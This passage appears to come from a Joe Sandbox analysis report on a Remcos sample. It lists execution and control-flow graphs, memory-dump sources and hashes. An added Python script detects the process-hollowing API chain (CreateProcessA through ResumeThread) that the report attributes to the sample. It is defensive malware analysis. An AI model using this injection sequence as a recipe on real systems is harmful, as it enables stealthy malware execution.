ResumeThread 23811->23812 23814 74c7229 23812->23814 23814->23755 23816 74c71f8 ResumeThread 23815->23816 23818 74c7229 23816->23818 23818->23755 23820 74c7880 WriteProcessMemory 23819->23820 23822 74c78d7 23820->23822 23822->23760 23824 74c7880 WriteProcessMemory 23823->23824 23826 74c78d7 23824->23826 23826->23760 23828 74c76e5 Wow64SetThreadContext 23827->23828 23830 74c772d 23828->23830 23830->23770 23832 74c76e5 Wow64SetThreadContext 23831->23832 23834 74c772d 23832->23834 23834->23770 23836 74c7b49 CreateProcessA 23835->23836 23838 74c7d0b 23836->23838 23838->23838 23840 74c7b49 CreateProcessA 23839->23840 23842 74c7d0b 23840->23842 23844 74c7973 ReadProcessMemory 23843->23844 23846 74c79b7 23844->23846 23846->23789 23848 74c7973 
ReadProcessMemory 23847->23848 23850 74c79b7 23848->23850 23850->23789 23852 74c77b8 VirtualAllocEx 23851->23852 23854 74c77f5 23852->23854 23854->23794 23856 74c77b8 VirtualAllocEx 23855->23856 23858 74c77f5 23856->23858 23858->23794
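The execution graph above chains CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext and ResumeThread under a single root (node 23701 at 74c8200, process 24, module at 074C0000), which is the process-hollowing sequence behind the "Injects a PE file into a foreign processes" signature. The script below is an added example and is not part of the Joe Sandbox report: it parses the execution_graph token listing (the grammar, node = `<id> <hex address> [API name | 'N API calls']`, edge = `<src>-><dst>`, is an assumption inferred from the text above), computes which graph roots reach the full hollowing chain, and lists the address of every node that resolves one of those APIs. The embedded sample is a constructed excerpt of the report's own node and edge tokens, trimmed to that path.

```python
"""Parse a Joe Sandbox execution_graph listing and flag a process-hollowing API chain.

Added example, not part of the Joe Sandbox report. The token grammar is an
assumption inferred from the listing above:
  node: "<id> <hex address> [API name ... | 'N API calls']"
  edge: "<src id>-><dst id>"
"""
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{1,16}$")

# Constructed sample: tokens copied from the report's execution_graph above,
# trimmed to the nodes on the injection path in process 24 (module at 0x74C0000).
SAMPLE_GRAPH = """
execution_graph 23886 74c8079 23887 74c7edc 23886->23887 23888 74c815b 23887->23888
23889 74c9c9e 12 API calls 23887->23889
23701 74c8200 23702 74c8180 23701->23702 23707 74c9c9e 23702->23707 23703 74c82b3
23708 74c9c2c 23707->23708 23709 74c9c5a 23708->23709 23753 74ca6e6 23708->23753
23763 74ca355 23708->23763 23773 74ca454 23708->23773 23777 74ca0f9 23708->23777
23792 74ca25f 23708->23792 23797 74ca17e 23708->23797 23806 74ca2dd 23708->23806
23709->23703
23754 74ca6ec 23753->23754 23811 74c71b8 23754->23811 23755 74ca737 23755->23709
23812 74c71f8 ResumeThread 23811->23812 23814 74c7229 23812->23814 23814->23755
23764 74ca362 23763->23764 23766 74c71b8 ResumeThread 23764->23766 23765 74ca737 23765->23709 23766->23765
23775 74c769f Wow64SetThreadContext 23773->23775 23774 74ca46e 23775->23774
23778 74ca10c 23777->23778 23835 74c7abf 23778->23835 23836 74c7b49 CreateProcessA 23835->23836 23838 74c7d0b 23836->23838 23838->23838
23793 74ca322 23792->23793 23851 74c7778 23793->23851 23794 74ca340 23852 74c77b8 VirtualAllocEx 23851->23852 23854 74c77f5 23852->23854 23854->23794
23799 74c7838 WriteProcessMemory 23797->23799 23798 74ca1ac 23798->23709 23799->23798
23807 74ca2e3 23806->23807 23808 74ca1e2 23807->23808 23809 74c7928 ReadProcessMemory 23807->23809 23809->23808
"""

# Minimal hollowing sequence; ReadProcessMemory is a frequent but optional companion
# (reading the target's headers/PEB before overwriting it).
HOLLOWING_CHAIN = ("CreateProcessA", "VirtualAllocEx", "WriteProcessMemory",
                   "Wow64SetThreadContext", "ResumeThread")


def parse_graph(text):
    """Return (nodes, edges): nodes[id] = {"addr", "apis"}, edges[src] = {dst, ...}."""
    nodes, edges = {}, defaultdict(set)
    toks = text.split()
    i, cur = 0, None
    while i < len(toks):
        tok = toks[i]
        m = EDGE_RE.match(tok)
        if m:
            edges[m.group(1)].add(m.group(2))
            cur = None                       # API names only follow a node declaration
            i += 1
        elif tok.isdigit() and toks[i + 1:i + 3] == ["API", "calls"]:
            if cur is None:
                raise ValueError(f"token {i}: summary label outside a node")
            nodes[cur]["apis"].append(f"{tok} API calls")   # unresolved summary label
            i += 3
        elif tok.isdigit():
            if i + 1 >= len(toks) or not ADDR_RE.match(toks[i + 1]):
                raise ValueError(f"node {tok}: missing or bad address token")
            cur = tok
            nodes.setdefault(cur, {"addr": toks[i + 1], "apis": []})
            i += 2
        elif tok == "execution_graph":
            i += 1
        else:
            if cur is None:
                raise ValueError(f"token {i}: API name {tok!r} outside a node")
            nodes[cur]["apis"].append(tok)   # imported API resolved at this node
            i += 1
    return nodes, edges


def reachable_apis(nodes, edges, root):
    """Set of API labels on every node reachable from root (BFS over the edges)."""
    seen, queue, apis = {root}, deque([root]), set()
    while queue:
        n = queue.popleft()
        apis.update(nodes.get(n, {}).get("apis", []))
        for m in edges.get(n, ()):
            if m not in seen:
                seen.add(m)
                queue.append(m)
    return apis


def find_entry_nodes(nodes, edges):
    """Nodes with no incoming edge: the graph's roots (top-level functions)."""
    targets = {d for ds in edges.values() for d in ds}
    return sorted(n for n in nodes if n not in targets)


def hollowing_roots(nodes, edges):
    """Map root id -> address for every root that reaches the whole hollowing chain."""
    hits = {}
    for root in find_entry_nodes(nodes, edges):
        apis = reachable_apis(nodes, edges, root)
        if all(api in apis for api in HOLLOWING_CHAIN):
            hits[root] = nodes[root]["addr"]
    return hits


def api_sites(nodes):
    """Map each resolved API name to the sorted addresses of the nodes that call it."""
    sites = defaultdict(set)
    for n in nodes.values():
        for api in n["apis"]:
            if not api.endswith("API calls"):
                sites[api].add(n["addr"])
    return {api: sorted(addrs) for api, addrs in sites.items()}


if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE_GRAPH)
    for api, addrs in sorted(api_sites(nodes).items()):
        print(f"{api:24s} {', '.join(addrs)}")
    for root, addr in hollowing_roots(nodes, edges).items():
        print(f"hollowing chain reachable from root {root} ({addr})")
```

Run against the sample, the only root that reaches all five APIs is node 23701 (74c8200); the other root, 23886, bottoms out in the unresolved "12 API calls" summary node, which is why the parser keeps such labels separate from resolved API names rather than discarding them. Because the report's execution coverage is 10.3%, the graph records only paths that actually executed, so absence of an API from a root is evidence of what ran, not of what the code can do.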

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 015AD01E
                                              • GetCurrentThread.KERNEL32 ref: 015AD05B
                                              • GetCurrentProcess.KERNEL32 ref: 015AD098
                                              • GetCurrentThreadId.KERNEL32 ref: 015AD0F1
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: e55020506258f33070dc472f9b0f8dcf0052b901c762d37c38d5b1c631513b9f
                                              • Instruction ID: 7e627856fcead53d7b98ee2d116ea0ecbfd027d7fc0909245dff5c5bbd7cc920
                                              • Opcode Fuzzy Hash: e55020506258f33070dc472f9b0f8dcf0052b901c762d37c38d5b1c631513b9f
                                              • Instruction Fuzzy Hash: FF5168B49017498FEB14DFA9D54879EBBF1BF88304F208459D409AB350D7745944CB25

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 015AD01E
                                              • GetCurrentThread.KERNEL32 ref: 015AD05B
                                              • GetCurrentProcess.KERNEL32 ref: 015AD098
                                              • GetCurrentThreadId.KERNEL32 ref: 015AD0F1
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 65b27aaed224606f8b9201d2e88cd238d63a88b932ce9cb00e72766385a0108d
                                              • Instruction ID: fb90f87682641789deac64df559d4570dfc7d9634bab45b16d9295dcd6f0cca0
                                              • Opcode Fuzzy Hash: 65b27aaed224606f8b9201d2e88cd238d63a88b932ce9cb00e72766385a0108d
                                              • Instruction Fuzzy Hash: 8F5177B09017498FEB28DFAAD548B9EBBF1FF88304F208459D409AB360D7749944CF66

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 44 74c7ac0-74c7b55 46 74c7b8e-74c7bae 44->46 47 74c7b57-74c7b61 44->47 52 74c7be7-74c7c16 46->52 53 74c7bb0-74c7bba 46->53 47->46 48 74c7b63-74c7b65 47->48 50 74c7b88-74c7b8b 48->50 51 74c7b67-74c7b71 48->51 50->46 54 74c7b75-74c7b84 51->54 55 74c7b73 51->55 63 74c7c4f-74c7d09 CreateProcessA 52->63 64 74c7c18-74c7c22 52->64 53->52 56 74c7bbc-74c7bbe 53->56 54->54 57 74c7b86 54->57 55->54 58 74c7bc0-74c7bca 56->58 59 74c7be1-74c7be4 56->59 57->50 61 74c7bcc 58->61 62 74c7bce-74c7bdd 58->62 59->52 61->62 62->62 65 74c7bdf 62->65 75 74c7d0b-74c7d11 63->75 76 74c7d12-74c7d98 63->76 64->63 66 74c7c24-74c7c26 64->66 65->59 68 74c7c28-74c7c32 66->68 69 74c7c49-74c7c4c 66->69 70 74c7c34 68->70 71 74c7c36-74c7c45 68->71 69->63 70->71 71->71 72 74c7c47 71->72 72->69 75->76 86 74c7da8-74c7dac 76->86 87 74c7d9a-74c7d9e 76->87 89 74c7dbc-74c7dc0 86->89 90 74c7dae-74c7db2 86->90 87->86 88 74c7da0 87->88 88->86 92 74c7dd0-74c7dd4 89->92 93 74c7dc2-74c7dc6 89->93 90->89 91 74c7db4 90->91 91->89 95 74c7de6-74c7ded 92->95 96 74c7dd6-74c7ddc 92->96 93->92 94 74c7dc8 93->94 94->92 97 74c7def-74c7dfe 95->97 98 74c7e04 95->98 96->95 97->98 100 74c7e05 98->100 100->100
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074C7CF6
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 4525b2da250811a94d36ae8709e9b14ba4a51b71140c0e190ffdf822efef4357
                                              • Instruction ID: f4cda6cdc80c67e97c606731459556c8185a293c5f9609dba323c4059e9e93c7
                                              • Opcode Fuzzy Hash: 4525b2da250811a94d36ae8709e9b14ba4a51b71140c0e190ffdf822efef4357
                                              • Instruction Fuzzy Hash: A0916CB5D0031ACFEB65CF68C841BEEBBB2BF44314F14856AE819A7240DB749985CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 101 74c7abf-74c7b55 103 74c7b8e-74c7bae 101->103 104 74c7b57-74c7b61 101->104 109 74c7be7-74c7c16 103->109 110 74c7bb0-74c7bba 103->110 104->103 105 74c7b63-74c7b65 104->105 107 74c7b88-74c7b8b 105->107 108 74c7b67-74c7b71 105->108 107->103 111 74c7b75-74c7b84 108->111 112 74c7b73 108->112 120 74c7c4f-74c7d09 CreateProcessA 109->120 121 74c7c18-74c7c22 109->121 110->109 113 74c7bbc-74c7bbe 110->113 111->111 114 74c7b86 111->114 112->111 115 74c7bc0-74c7bca 113->115 116 74c7be1-74c7be4 113->116 114->107 118 74c7bcc 115->118 119 74c7bce-74c7bdd 115->119 116->109 118->119 119->119 122 74c7bdf 119->122 132 74c7d0b-74c7d11 120->132 133 74c7d12-74c7d98 120->133 121->120 123 74c7c24-74c7c26 121->123 122->116 125 74c7c28-74c7c32 123->125 126 74c7c49-74c7c4c 123->126 127 74c7c34 125->127 128 74c7c36-74c7c45 125->128 126->120 127->128 128->128 129 74c7c47 128->129 129->126 132->133 143 74c7da8-74c7dac 133->143 144 74c7d9a-74c7d9e 133->144 146 74c7dbc-74c7dc0 143->146 147 74c7dae-74c7db2 143->147 144->143 145 74c7da0 144->145 145->143 149 74c7dd0-74c7dd4 146->149 150 74c7dc2-74c7dc6 146->150 147->146 148 74c7db4 147->148 148->146 152 74c7de6-74c7ded 149->152 153 74c7dd6-74c7ddc 149->153 150->149 151 74c7dc8 150->151 151->149 154 74c7def-74c7dfe 152->154 155 74c7e04 152->155 153->152 154->155 157 74c7e05 155->157 157->157
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074C7CF6
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: d1521bf0c3d915d1b875fcd704abf47a399fc8dbfd8fb9766d8afe043bced41f
                                              • Instruction ID: ae585fe625545be1f5efb12b125fd55f89966b456c88e92a84e121b50323f9fe
                                              • Opcode Fuzzy Hash: d1521bf0c3d915d1b875fcd704abf47a399fc8dbfd8fb9766d8afe043bced41f
                                              • Instruction Fuzzy Hash: 6D916CB5D0031ACFEB65CF68C8417EEBBB2BF44314F14856AE819A7240DB749985CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 158 15aad08-15aad17 159 15aad19-15aad26 call 15aa02c 158->159 160 15aad43-15aad47 158->160 165 15aad28 159->165 166 15aad3c 159->166 162 15aad5b-15aad9c 160->162 163 15aad49-15aad53 160->163 169 15aada9-15aadb7 162->169 170 15aad9e-15aada6 162->170 163->162 215 15aad2e call 15aaf90 165->215 216 15aad2e call 15aafa0 165->216 166->160 171 15aaddb-15aaddd 169->171 172 15aadb9-15aadbe 169->172 170->169 177 15aade0-15aade7 171->177 174 15aadc9 172->174 175 15aadc0-15aadc7 call 15aa038 172->175 173 15aad34-15aad36 173->166 176 15aae78-15aaef4 173->176 179 15aadcb-15aadd9 174->179 175->179 208 15aaf20-15aaf38 176->208 209 15aaef6-15aaf1e 176->209 180 15aade9-15aadf1 177->180 181 15aadf4-15aadfb 177->181 179->177 180->181 183 15aae08-15aae11 call 15aa048 181->183 184 15aadfd-15aae05 181->184 189 15aae1e-15aae23 183->189 190 15aae13-15aae1b 183->190 184->183 191 15aae41-15aae45 189->191 192 15aae25-15aae2c 189->192 190->189 217 15aae48 call 15ab270 191->217 218 15aae48 call 15ab2a0 191->218 192->191 194 15aae2e-15aae3e call 15aa058 call 15aa068 192->194 194->191 197 15aae4b-15aae4e 199 15aae50-15aae6e 197->199 200 15aae71-15aae77 197->200 199->200 210 15aaf3a-15aaf3d 208->210 211 15aaf40-15aaf6b GetModuleHandleW 208->211 209->208 210->211 212 15aaf6d-15aaf73 211->212 213 15aaf74-15aaf88 211->213 212->213 215->173 216->173 217->197 218->197
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 015AAF5E
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: f652181ac0b4e90936dc3f05a7efd7aac27135a350aabdd0f79c2a60173d2677
                                              • Instruction ID: 1388292a47adf30635faa17051fc7fe2dca22b6cd5a490cc0533acee87b45eba
                                              • Opcode Fuzzy Hash: f652181ac0b4e90936dc3f05a7efd7aac27135a350aabdd0f79c2a60173d2677
                                              • Instruction Fuzzy Hash: FA814570A00B068FEB65DF29D04075EBBF1FF88204F108A2DD59A9BA50E775E849CB90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 219 15a58ec-15a58f6 220 15a58f8-15a59b9 CreateActCtxA 219->220 222 15a59bb-15a59c1 220->222 223 15a59c2-15a5a1c 220->223 222->223 230 15a5a2b-15a5a2f 223->230 231 15a5a1e-15a5a21 223->231 232 15a5a40 230->232 233 15a5a31-15a5a3d 230->233 231->230 234 15a5a41 232->234 233->232 234->234
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 015A59A9
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 68e8d323caeedb379602617256351e1640d338fc17b1a68b19f862e3995e66af
                                              • Instruction ID: 189bce8618597477ace080542e46215f18b22832aab857031d4eb946d86fa664
                                              • Opcode Fuzzy Hash: 68e8d323caeedb379602617256351e1640d338fc17b1a68b19f862e3995e66af
                                              • Instruction Fuzzy Hash: 5241DF70D107198FDB24CFA9C884BCEBBB1BF49304F60806AD408AB251EBB56946CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 236 15a44b4-15a59b9 CreateActCtxA 239 15a59bb-15a59c1 236->239 240 15a59c2-15a5a1c 236->240 239->240 247 15a5a2b-15a5a2f 240->247 248 15a5a1e-15a5a21 240->248 249 15a5a40 247->249 250 15a5a31-15a5a3d 247->250 248->247 251 15a5a41 249->251 250->249 251->251
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 015A59A9
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 5f73032edab73bc180619ae6b3e9ed2b8643f9d9352ecde9cfdf231275843d23
                                              • Instruction ID: 1cf75656106fcb3048b67840fa9e6d6d2313bd8ec9bd0c170a72049193e787db
                                              • Opcode Fuzzy Hash: 5f73032edab73bc180619ae6b3e9ed2b8643f9d9352ecde9cfdf231275843d23
                                              • Instruction Fuzzy Hash: 3341CE70D1071D8FDB24DFA9C844B9EBBF5BF49304F60806AD408AB251DBB56945CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 253 74c7838-74c7886 255 74c7888-74c7894 253->255 256 74c7896-74c78d5 WriteProcessMemory 253->256 255->256 258 74c78de-74c790e 256->258 259 74c78d7-74c78dd 256->259 259->258
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074C78C8
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 986c75f5bf4f25bb5b40af9bf2e279b0992a2a58f3ec15161036f5cfe7b62047
                                              • Instruction ID: d5397cbdbe7b9d8755373223e1b51aefaf4bd2bd3d910dc20bea886f9ae9331f
                                              • Opcode Fuzzy Hash: 986c75f5bf4f25bb5b40af9bf2e279b0992a2a58f3ec15161036f5cfe7b62047
                                              • Instruction Fuzzy Hash: 162126B59003499FDB10CFA9C985BEEBBF5FF48310F14842AE918A7240D7789944CBA1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 263 15ad5e8-15ad5ec 264 15ad5ee-15ad62f 263->264 265 15ad632-15ad684 DuplicateHandle 263->265 264->265 266 15ad68d-15ad6aa 265->266 267 15ad686-15ad68c 265->267 267->266
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015AD677
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 290a23774319796a46f961c75297959289b95ee4dd0f615a0a833ec98c423556
                                              • Instruction ID: d8716328c032ee094cf03e9c83d4264b22dccd313a369ce6f34f0643c25388bf
                                              • Opcode Fuzzy Hash: 290a23774319796a46f961c75297959289b95ee4dd0f615a0a833ec98c423556
                                              • Instruction Fuzzy Hash: 282135B580024ADFDB11CFA9D584BDEBFF4BF08320F14855AE958A7250D378A941CF61

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 270 74c7837-74c7886 272 74c7888-74c7894 270->272 273 74c7896-74c78d5 WriteProcessMemory 270->273 272->273 275 74c78de-74c790e 273->275 276 74c78d7-74c78dd 273->276 276->275
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074C78C8
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 11e44cb6b31f7c090da38e0e5e3b72a03025c6ed1cdc43f1fec5c1b7b036b374
                                              • Instruction ID: 9407815328ed3401d2b332fc3f0b1bfe9db81b14ae0f67801dd4a49d62496002
                                              • Opcode Fuzzy Hash: 11e44cb6b31f7c090da38e0e5e3b72a03025c6ed1cdc43f1fec5c1b7b036b374
                                              • Instruction Fuzzy Hash: 832126B69003099FDB10CFA9C985BEEBBF5FF48310F14882AE518A7240D7789544CBA0

                                              Control-flow Graph (rendered image, node/edge dump not reproduced): function spans 74c7921-74c79ee; ReadProcessMemory is called from block 74c7921-74c79b5.
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074C79A8
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 079b68c4be6f780dc2a0a2cfa442fd2934545b49130fe03415f37509fb32f631
                                              • Instruction ID: 660168222c9bf8f9baa07be10cd9bf3496f223cda05a7b64d38e930e2e4d4829
                                              • Opcode Fuzzy Hash: 079b68c4be6f780dc2a0a2cfa442fd2934545b49130fe03415f37509fb32f631
                                              • Instruction Fuzzy Hash: CA2119B58003599FDB10CFA9C884BEEBBF5FF48310F14842EE559A7240D7799545CBA1

                                              Control-flow Graph (rendered image, node/edge dump not reproduced): function spans 74c76a0-74c7764; Wow64SetThreadContext is called from block 74c76fb-74c772b.
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074C771E
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 1e3db147cd28917c472ea50b27a1ff584b219b5bd0d21df441cbf7f400f7fb7e
                                              • Instruction ID: 0495ec9176e04e896de264cc9fa252239ae99266177bdf9b677f8597943b1bc4
                                              • Opcode Fuzzy Hash: 1e3db147cd28917c472ea50b27a1ff584b219b5bd0d21df441cbf7f400f7fb7e
                                              • Instruction Fuzzy Hash: 3F2115B59003098FDB14DFAAC4857EEBBF4EF48224F14842ED559A7340D778A945CFA1

                                              Control-flow Graph (rendered image, node/edge dump not reproduced): function spans 74c7928-74c79ee; ReadProcessMemory is called from block 74c7928-74c79b5.
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074C79A8
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 055951e5fe8d4198e8dcfb57b085bdbab085f53384e9b2bfb1a9327bc3b171a9
                                              • Instruction ID: 1066a1187fe1b07ee6f2da2864da8c66813bd846484ffd4cb5dec489650ccd96
                                              • Opcode Fuzzy Hash: 055951e5fe8d4198e8dcfb57b085bdbab085f53384e9b2bfb1a9327bc3b171a9
                                              • Instruction Fuzzy Hash: 2F2125B18003499FDB10CFAAC884BEEFBF5FF48310F14842AE958A7240D7799940CBA1

                                              Control-flow Graph (rendered image, node/edge dump not reproduced): function spans 15ad5f0-15ad6aa; DuplicateHandle is called from block 15ad5f0-15ad684.
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015AD677
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 3b36e2aadc1ddd60b33f433043f8b40944503f9463c15b72fdf19435a24ae811
                                              • Instruction ID: d973123367ad28ae5a263af0def7d4c2fe322c3be946af070a5ecb1718dfe3e6
                                              • Opcode Fuzzy Hash: 3b36e2aadc1ddd60b33f433043f8b40944503f9463c15b72fdf19435a24ae811
                                              • Instruction Fuzzy Hash: 6621C4B59002499FDB10CF9AD584ADEBFF4FB48310F14841AE918A7750D374A954CF65

                                              Control-flow Graph (rendered image, node/edge dump not reproduced): function spans 74c769f-74c7764; Wow64SetThreadContext is called from block 74c76fb-74c772b.
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074C771E
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 5dbae8703a31f9cde1fd377dcf9db220f4bf1350441d67ee1c51f6bd3b646d17
                                              • Instruction ID: 042566c8e2575ad2d9d92e2edf5c43a01a96156dc35f18f058fb6d71daf97e6b
                                              • Opcode Fuzzy Hash: 5dbae8703a31f9cde1fd377dcf9db220f4bf1350441d67ee1c51f6bd3b646d17
                                              • Instruction Fuzzy Hash: E52124B6D003098FDB14CFAAC5857EEBBF4AF48224F14842ED559A7340D778AA45CFA1
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074C77E6
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 55ffdf8c3e756f98a00a8dba6a4e1020116ec0fa259ad8384608f988528aed86
                                              • Instruction ID: 2992a5e83f24a370ce7098ae938920696b69515aee74d37c379f771d705196b1
                                              • Opcode Fuzzy Hash: 55ffdf8c3e756f98a00a8dba6a4e1020116ec0fa259ad8384608f988528aed86
                                              • Instruction Fuzzy Hash: E61137768003499FDB10DFAAC845BDFBBF5EF48310F14841AE519A7250C775A540CFA1
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074C77E6
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1609015931.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_74c0000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 30197c67f125b9e880d39ee86cde85e1bd46b3031fecaf570f9ccceffef13c3a
                                              • Instruction ID: 5bd10557265cc8bca0cd92f83857f69f92d9a118e4627697003d1e3d02c4062c
